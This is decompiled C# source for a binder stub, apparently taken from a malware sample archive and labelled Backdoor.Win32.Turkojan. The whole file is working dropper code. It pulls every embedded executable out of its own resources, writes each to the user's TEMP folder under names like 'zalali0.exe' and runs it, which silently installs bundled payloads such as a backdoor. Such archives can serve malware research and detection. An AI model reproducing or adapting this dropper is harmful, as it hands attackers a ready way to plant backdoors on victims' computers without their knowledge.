MalwareSourceCode/MSIL/Backdoor/Win32/T/Backdoor.Win32.Turkojan.zwh-f0049c93796fd4cb0a1aa182144a91d8f55ea869b6c1c47f48a047e89db918cf/Program.cs

// Decompiled with JetBrains decompiler
// Type: binderstub.Program
// Assembly: dsdfggdfgd, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 774DF6EC-7CD7-472C-B5F5-E0E4A9820F8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Turkojan.zwh-f0049c93796fd4cb0a1aa182144a91d8f55ea869b6c1c47f48a047e89db918cf.exe

using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Windows.Forms;

namespace binderstub
{
  internal class Program
  {
    private static void Main()
    {
      string[] strArray = new string[2]{ "exe", "exe" };
      Assembly executingAssembly = Assembly.GetExecutingAssembly();
      string[] manifestResourceNames = executingAssembly.GetManifestResourceNames();
      int index = 0;
      foreach (string name in manifestResourceNames)
      {
        if (name.IndexOf(".exe") != -1)
        {
          Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(name);
          byte[] buffer = new byte[manifestResourceStream.Length];
          manifestResourceStream.Read(buffer, 0, buffer.Length);
          string str = Environment.GetEnvironmentVariable("TEMP") + "\\zalali" + index.ToString() + "." + strArray[index];
          FileStream fileStream = new FileStream(str, FileMode.Create);
          fileStream.Write(buffer, 0, buffer.Length);
          fileStream.Dispose();
          manifestResourceStream.Dispose();
          Process.Start(str);
          ++index;
        }
      }
      Application.Exit();
    }
  }
}